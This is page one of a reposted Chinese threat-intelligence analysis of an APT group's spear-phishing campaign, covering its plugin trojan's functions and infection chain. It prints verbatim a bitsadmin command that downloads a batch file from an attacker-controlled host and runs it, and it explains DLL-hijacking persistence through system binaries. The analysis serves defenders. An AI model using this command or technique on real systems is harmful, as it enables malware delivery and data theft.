欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

“寄生兽”的极地行动:最新APT组织“寄生兽”活动披露

来源:本站整理 作者:佚名 时间:2018-05-03 TAG: 我要投稿

一、 概述
“寄生兽”APT组织(T-APT-02)是腾讯御见威胁情报中心2017年捕获并开始追踪的高级APT组织。该组织具有众多特点。
主要特点如下:
1) 该组织攻击所使用的木马是专有木马,手段新颖,且使用范围小,只针对特定对象进行攻击,因此至今未被披露过;
2) 该组织喜欢把木马隐藏在开源的代码中进行伪装,如putty、openssl、zlib等,把少量木马代码隐藏在大量的开源代码中,从而实现躲避检测的目的,因此将其取名“寄生兽”;
3) 该组织经常使用漏洞将木马捆绑成office系列文件进行传播,包括近期流行的CVE-2017-11882、CVE-2017-8570等,甚至我们发现该木马的插件还能够利用CVE-2017-8570漏洞对用户U盘中的office系列文件进行感染,捆上木马从而实现磁盘传播;
4) 该木马主要以插件形式工作,针对不同人群释放不同功能插件,十分灵活。插件的功能包括且不限于:
a) 获取并上传可移动磁盘中特定格式的文档;
b) 记录并上传活动窗口标题和按键信息;
c) 定时截屏并上传;
d) 下载DLL并执行,在局域网内渗透;
e) 将可移动磁盘中的office文档转换为rtf格式,再捆绑漏洞攻击木马;
f) 获取本地邮箱、浏览器存储的密码;
二、 载荷投递
“寄生兽”APT组织的攻击方式为鱼叉攻击,利用最新的office漏洞进行攻击。以捕捉到的某个诱饵文件(letter.doc)为例进行分析。
该文件使用当时最新的office漏洞CVE-2017-11882进行精心构造,漏洞触发后,执行如下命令:
cmd /c "bitsadmin /transfer m /download http://luriasstereo.net/i.bat %temp%/i.bat&%temp%/i.bat"
1.bat分析
该文件内容如下,主要功能是启动一个powershell,并执行随后的powershell脚本,脚本经过编码和加密。

解密后内容如下,功能是下载hxxp://luriasstereo.net/a.php脚本回来运行。

a.php分析
php内容如下:

可以看出,该脚本主要功能是将编码加密过的4个变量解密出来写入到
%temp% \OE45QH5H
%temp%\VO26IE53
%temp%\OE45QH6H
%temp%\VO26IE54
4个文件中,最后再解密出一段脚本出来执行。
解码后的部分脚本如下:

其功能是判断系统是32位或者64位,进而用AES解密相对应的文件(x64:OE45QH6H、VO26IE54,x86: OE45QH5H、VO26IE53),解密后分别将其移动到
%windir%\system32\msfte.dll
%windir%\system32\NTWDBLIB.dll
随后启动%windir%\System32\cliconfg.exe(这个是系统自带SQL相关文件,启动后会加载msfte.dll、NTWDBLIB.dll)
NTWDBLIB.dll分析
1) 将系统WSerch服务设置为开机自启动(其实该服务系统默认就是自启动的,该系统服务SearchIndexer.exe会加载msfte.dll,从而木马开机能够自启动)。

2) 检测服务启动状态,当检测到服务成功启动后,创建MO4TH2H0.bat文件执行自删除操作(删除NTWDBLIB.dll)

msfte.dll分析
该文件会被cliconfg.exe进程加载,也会在系统重启后被WSerch服务的主进程(SearchIndexer.exe)加载,该模块启动后,在dllmain中判断当前加载自身的进程是否为SearchIndexer.exe,如果是,则将系统文件SearchProtocolHost.exe拷贝两份分别为
%windir%\system32\SearchWindowsHost.exe
%windir%\system32\SearchFolderHost.exe
并分别以system权限(svchost.exe)和当前用户权限(explorer.exe)运行拷贝后的文件。




系统自带的SearchProtocolHost.exe文件会尝试加载msfte.dll文件并调用其AccessRetailTracer或AccessDebugTracer接口函数,木马msfte.dll文件当然也导出了这两个函数。
注:以下两张代码截图为系统SearchProtocolHost.exe文件相关代码

[1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载